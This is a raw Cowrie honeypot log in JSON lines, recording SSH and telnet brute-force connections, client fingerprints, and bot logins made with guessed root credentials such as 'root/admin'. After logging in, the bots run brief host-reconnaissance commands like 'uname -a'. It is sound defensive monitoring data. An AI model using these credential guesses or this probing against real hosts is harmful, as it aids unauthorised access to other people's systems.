{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":2559,"dst_ip":"1.2.3.4","dst_port":22,"session":"428e69245e59","protocol":"ssh","message":"New connection: 212.227.235.229:2559 (1.2.3.4:22) [session: 428e69245e59]","sensor":"my-vps","timestamp":"2025-08-31T08:45:20.274133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T08:45:20.275046Z","src_ip":"212.227.235.229","session":"428e69245e59"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T08:45:20.399345Z","src_ip":"212.227.235.229","session":"428e69245e59"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T08:45:20.982859Z","src_ip":"212.227.235.229","session":"428e69245e59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49796,"dst_ip":"1.2.3.4","dst_port":23,"session":"39ed5c78e47d","protocol":"telnet","message":"New connection: 212.227.125.160:49796 (1.2.3.4:23) [session: 39ed5c78e47d]","sensor":"my-vps","timestamp":"2025-08-31T08:45:21.049954Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:45:22.109461Z","src_ip":"212.227.235.229","session":"428e69245e59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58272,"dst_ip":"1.2.3.4","dst_port":22,"session":"b520e5794c28","protocol":"ssh","message":"New connection: 212.227.125.160:58272 (1.2.3.4:22) [session: b520e5794c28]","sensor":"my-vps","timestamp":"2025-08-31T08:45:25.196278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:45:26.200476Z","src_ip":"212.227.125.160","session":"b520e5794c28"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:45:26.201448Z","src_ip":"212.227.125.160","session":"b520e5794c28"}
{"eventid":"cowrie.session.closed","duration":12.605908870697021,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:45:32.852774Z","src_ip":"212.227.125.160","session":"d435fbe17f0a"}
{"eventid":"cowrie.login.success","username":"root","password":"f156mnnn","message":"login attempt [root/f156mnnn] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:45:33.262150Z","src_ip":"212.227.125.160","session":"b520e5794c28"}
{"eventid":"cowrie.session.closed","duration":12.687969207763672,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:45:33.737851Z","src_ip":"212.227.125.160","session":"39ed5c78e47d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49949,"dst_ip":"1.2.3.4","dst_port":23,"session":"086679a76505","protocol":"telnet","message":"New connection: 212.227.125.160:49949 (1.2.3.4:23) [session: 086679a76505]","sensor":"my-vps","timestamp":"2025-08-31T08:45:34.924015Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49946,"dst_ip":"1.2.3.4","dst_port":23,"session":"964effb99ee0","protocol":"telnet","message":"New connection: 212.227.125.160:49946 (1.2.3.4:23) [session: 964effb99ee0]","sensor":"my-vps","timestamp":"2025-08-31T08:45:35.997359Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:45:36.627927Z","src_ip":"212.227.125.160","session":"b520e5794c28"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-31T08:45:36.628730Z","src_ip":"212.227.125.160","session":"b520e5794c28"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:45:38.027284Z","src_ip":"212.227.125.160","session":"b520e5794c28"}
{"eventid":"cowrie.session.closed","duration":"12.8","message":"Connection lost after 12.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:45:38.028438Z","src_ip":"212.227.125.160","session":"b520e5794c28"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":53722,"dst_ip":"1.2.3.4","dst_port":22,"session":"56769933296a","protocol":"ssh","message":"New connection: 201.148.180.50:53722 (1.2.3.4:22) [session: 56769933296a]","sensor":"my-vps","timestamp":"2025-08-31T08:45:45.739454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:45:46.826273Z","src_ip":"201.148.180.50","session":"56769933296a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:45:46.827039Z","src_ip":"201.148.180.50","session":"56769933296a"}
{"eventid":"cowrie.session.closed","duration":12.817688226699829,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:45:47.741630Z","src_ip":"212.227.125.160","session":"086679a76505"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50181,"dst_ip":"1.2.3.4","dst_port":23,"session":"6b69978719e7","protocol":"telnet","message":"New connection: 212.227.125.160:50181 (1.2.3.4:23) [session: 6b69978719e7]","sensor":"my-vps","timestamp":"2025-08-31T08:45:48.010478Z"}
{"eventid":"cowrie.session.closed","duration":12.734500408172607,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:45:48.731792Z","src_ip":"212.227.125.160","session":"964effb99ee0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50227,"dst_ip":"1.2.3.4","dst_port":23,"session":"a77729eecfe8","protocol":"telnet","message":"New connection: 212.227.125.160:50227 (1.2.3.4:23) [session: a77729eecfe8]","sensor":"my-vps","timestamp":"2025-08-31T08:45:48.963583Z"}
{"eventid":"cowrie.login.success","username":"root","password":"f156mnnn","message":"login attempt [root/f156mnnn] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:45:51.450003Z","src_ip":"201.148.180.50","session":"56769933296a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:45:53.560610Z","src_ip":"201.148.180.50","session":"56769933296a"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T08:45:53.561282Z","src_ip":"201.148.180.50","session":"56769933296a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:45:54.674850Z","src_ip":"201.148.180.50","session":"56769933296a"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:45:54.676090Z","src_ip":"201.148.180.50","session":"56769933296a"}
{"eventid":"cowrie.session.closed","duration":12.905714750289917,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:46:00.916121Z","src_ip":"212.227.125.160","session":"6b69978719e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50380,"dst_ip":"1.2.3.4","dst_port":23,"session":"64440ca21f28","protocol":"telnet","message":"New connection: 212.227.125.160:50380 (1.2.3.4:23) [session: 64440ca21f28]","sensor":"my-vps","timestamp":"2025-08-31T08:46:01.111439Z"}
{"eventid":"cowrie.session.closed","duration":12.862263202667236,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:46:01.825778Z","src_ip":"212.227.125.160","session":"a77729eecfe8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50381,"dst_ip":"1.2.3.4","dst_port":23,"session":"d9109ed95bce","protocol":"telnet","message":"New connection: 212.227.125.160:50381 (1.2.3.4:23) [session: d9109ed95bce]","sensor":"my-vps","timestamp":"2025-08-31T08:46:02.051872Z"}
{"eventid":"cowrie.session.closed","duration":12.615906715393066,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:46:13.727278Z","src_ip":"212.227.125.160","session":"64440ca21f28"}
{"eventid":"cowrie.session.closed","duration":12.747210502624512,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:46:14.799003Z","src_ip":"212.227.125.160","session":"d9109ed95bce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50530,"dst_ip":"1.2.3.4","dst_port":23,"session":"3f7af2da094c","protocol":"telnet","message":"New connection: 212.227.125.160:50530 (1.2.3.4:23) [session: 3f7af2da094c]","sensor":"my-vps","timestamp":"2025-08-31T08:46:14.928869Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50531,"dst_ip":"1.2.3.4","dst_port":23,"session":"9a99c3add270","protocol":"telnet","message":"New connection: 212.227.125.160:50531 (1.2.3.4:23) [session: 9a99c3add270]","sensor":"my-vps","timestamp":"2025-08-31T08:46:22.030081Z"}
{"eventid":"cowrie.session.closed","duration":12.8201584815979,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:46:27.748962Z","src_ip":"212.227.125.160","session":"3f7af2da094c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50677,"dst_ip":"1.2.3.4","dst_port":23,"session":"850d24e91ded","protocol":"telnet","message":"New connection: 212.227.125.160:50677 (1.2.3.4:23) [session: 850d24e91ded]","sensor":"my-vps","timestamp":"2025-08-31T08:46:30.934250Z"}
{"eventid":"cowrie.session.closed","duration":12.74435019493103,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:46:34.774359Z","src_ip":"212.227.125.160","session":"9a99c3add270"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50814,"dst_ip":"1.2.3.4","dst_port":23,"session":"d72dffaa7309","protocol":"telnet","message":"New connection: 212.227.125.160:50814 (1.2.3.4:23) [session: d72dffaa7309]","sensor":"my-vps","timestamp":"2025-08-31T08:46:34.982947Z"}
{"eventid":"cowrie.session.closed","duration":12.76785659790039,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:46:43.701997Z","src_ip":"212.227.125.160","session":"850d24e91ded"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50926,"dst_ip":"1.2.3.4","dst_port":23,"session":"64e69ca66f8f","protocol":"telnet","message":"New connection: 212.227.125.160:50926 (1.2.3.4:23) [session: 64e69ca66f8f]","sensor":"my-vps","timestamp":"2025-08-31T08:46:44.043461Z"}
{"eventid":"cowrie.session.closed","duration":12.72368311882019,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:46:47.706571Z","src_ip":"212.227.125.160","session":"d72dffaa7309"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50957,"dst_ip":"1.2.3.4","dst_port":23,"session":"397f23e7c656","protocol":"telnet","message":"New connection: 212.227.125.160:50957 (1.2.3.4:23) [session: 397f23e7c656]","sensor":"my-vps","timestamp":"2025-08-31T08:46:48.937159Z"}
{"eventid":"cowrie.session.closed","duration":12.72353720664978,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:46:56.766892Z","src_ip":"212.227.125.160","session":"64e69ca66f8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51099,"dst_ip":"1.2.3.4","dst_port":23,"session":"167406420075","protocol":"telnet","message":"New connection: 212.227.125.160:51099 (1.2.3.4:23) [session: 167406420075]","sensor":"my-vps","timestamp":"2025-08-31T08:46:56.900487Z"}
{"eventid":"cowrie.session.closed","duration":12.755686044692993,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:47:01.692741Z","src_ip":"212.227.125.160","session":"397f23e7c656"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51104,"dst_ip":"1.2.3.4","dst_port":23,"session":"7e2ab411232a","protocol":"telnet","message":"New connection: 212.227.125.160:51104 (1.2.3.4:23) [session: 7e2ab411232a]","sensor":"my-vps","timestamp":"2025-08-31T08:47:02.877882Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47508,"dst_ip":"1.2.3.4","dst_port":22,"session":"67407ba4f91a","protocol":"ssh","message":"New connection: 212.227.235.229:47508 (1.2.3.4:22) [session: 67407ba4f91a]","sensor":"my-vps","timestamp":"2025-08-31T08:47:05.253938Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:47:05.359837Z","src_ip":"212.227.235.229","session":"67407ba4f91a"}
{"eventid":"cowrie.session.closed","duration":12.791600227355957,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:47:09.691996Z","src_ip":"212.227.125.160","session":"167406420075"}
{"eventid":"cowrie.session.closed","duration":12.80881953239441,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:47:15.686629Z","src_ip":"212.227.125.160","session":"7e2ab411232a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51285,"dst_ip":"1.2.3.4","dst_port":23,"session":"d04531f0fd33","protocol":"telnet","message":"New connection: 212.227.125.160:51285 (1.2.3.4:23) [session: d04531f0fd33]","sensor":"my-vps","timestamp":"2025-08-31T08:47:15.879977Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:47:18.595655Z","src_ip":"176.65.149.186","session":"98b732f7e98d"}
{"eventid":"cowrie.session.closed","duration":180.06288504600525,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:47:18.599837Z","src_ip":"176.65.149.186","session":"98b732f7e98d"}
{"eventid":"cowrie.session.closed","duration":12.89419412612915,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:47:28.774106Z","src_ip":"212.227.125.160","session":"d04531f0fd33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51514,"dst_ip":"1.2.3.4","dst_port":23,"session":"1d845e5e0c36","protocol":"telnet","message":"New connection: 212.227.125.160:51514 (1.2.3.4:23) [session: 1d845e5e0c36]","sensor":"my-vps","timestamp":"2025-08-31T08:47:28.994044Z"}
{"eventid":"cowrie.session.closed","duration":12.74220585823059,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:47:41.736174Z","src_ip":"212.227.125.160","session":"1d845e5e0c36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51673,"dst_ip":"1.2.3.4","dst_port":23,"session":"87a2526a5026","protocol":"telnet","message":"New connection: 212.227.125.160:51673 (1.2.3.4:23) [session: 87a2526a5026]","sensor":"my-vps","timestamp":"2025-08-31T08:47:41.970008Z"}
{"eventid":"cowrie.session.closed","duration":12.706799507141113,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:47:54.676733Z","src_ip":"212.227.125.160","session":"87a2526a5026"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51816,"dst_ip":"1.2.3.4","dst_port":23,"session":"5b2a53ff1226","protocol":"telnet","message":"New connection: 212.227.125.160:51816 (1.2.3.4:23) [session: 5b2a53ff1226]","sensor":"my-vps","timestamp":"2025-08-31T08:47:54.865961Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:47:59.849285Z","src_ip":"212.227.235.229","session":"c6763ccb0c57"}
{"eventid":"cowrie.session.closed","duration":180.21597695350647,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:47:59.852883Z","src_ip":"212.227.235.229","session":"c6763ccb0c57"}
{"eventid":"cowrie.session.closed","duration":12.803066968917847,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:48:07.668949Z","src_ip":"212.227.125.160","session":"5b2a53ff1226"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51956,"dst_ip":"1.2.3.4","dst_port":23,"session":"d7cbb4ee1408","protocol":"telnet","message":"New connection: 212.227.125.160:51956 (1.2.3.4:23) [session: d7cbb4ee1408]","sensor":"my-vps","timestamp":"2025-08-31T08:48:07.893543Z"}
{"eventid":"cowrie.session.closed","duration":12.848456382751465,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:48:20.741923Z","src_ip":"212.227.125.160","session":"d7cbb4ee1408"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52098,"dst_ip":"1.2.3.4","dst_port":23,"session":"0c0fc59cb95f","protocol":"telnet","message":"New connection: 212.227.125.160:52098 (1.2.3.4:23) [session: 0c0fc59cb95f]","sensor":"my-vps","timestamp":"2025-08-31T08:48:21.025454Z"}
{"eventid":"cowrie.session.closed","duration":12.789277791976929,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:48:33.814654Z","src_ip":"212.227.125.160","session":"0c0fc59cb95f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49946,"dst_ip":"1.2.3.4","dst_port":23,"session":"77ea064508b9","protocol":"telnet","message":"New connection: 212.227.125.160:49946 (1.2.3.4:23) [session: 77ea064508b9]","sensor":"my-vps","timestamp":"2025-08-31T08:51:31.004708Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:51:31.093364Z","src_ip":"212.227.125.160","session":"77ea064508b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:51:31.112102Z","src_ip":"212.227.125.160","session":"77ea064508b9"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51030,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9c33e68a26f","protocol":"ssh","message":"New connection: 217.72.205.35:51030 (1.2.3.4:22) [session: d9c33e68a26f]","sensor":"my-vps","timestamp":"2025-08-31T08:51:33.065115Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:51:33.066244Z","src_ip":"217.72.205.35","session":"d9c33e68a26f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57805,"dst_ip":"1.2.3.4","dst_port":23,"session":"8ea753bc0876","protocol":"telnet","message":"New connection: 212.227.125.160:57805 (1.2.3.4:23) [session: 8ea753bc0876]","sensor":"my-vps","timestamp":"2025-08-31T08:51:40.090362Z"}
{"eventid":"cowrie.session.closed","duration":2.0005593299865723,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:51:42.090823Z","src_ip":"212.227.125.160","session":"8ea753bc0876"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48374,"dst_ip":"1.2.3.4","dst_port":22,"session":"983a55683361","protocol":"ssh","message":"New connection: 212.227.125.160:48374 (1.2.3.4:22) [session: 983a55683361]","sensor":"my-vps","timestamp":"2025-08-31T08:52:03.143767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:52:03.657190Z","src_ip":"212.227.125.160","session":"983a55683361"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:52:03.657999Z","src_ip":"212.227.125.160","session":"983a55683361"}
{"eventid":"cowrie.login.success","username":"root","password":"mdw!111096","message":"login attempt [root/mdw!111096] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:52:07.980844Z","src_ip":"212.227.125.160","session":"983a55683361"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:52:11.578144Z","src_ip":"212.227.125.160","session":"983a55683361"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T08:52:11.578948Z","src_ip":"212.227.125.160","session":"983a55683361"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:52:13.059847Z","src_ip":"212.227.125.160","session":"983a55683361"}
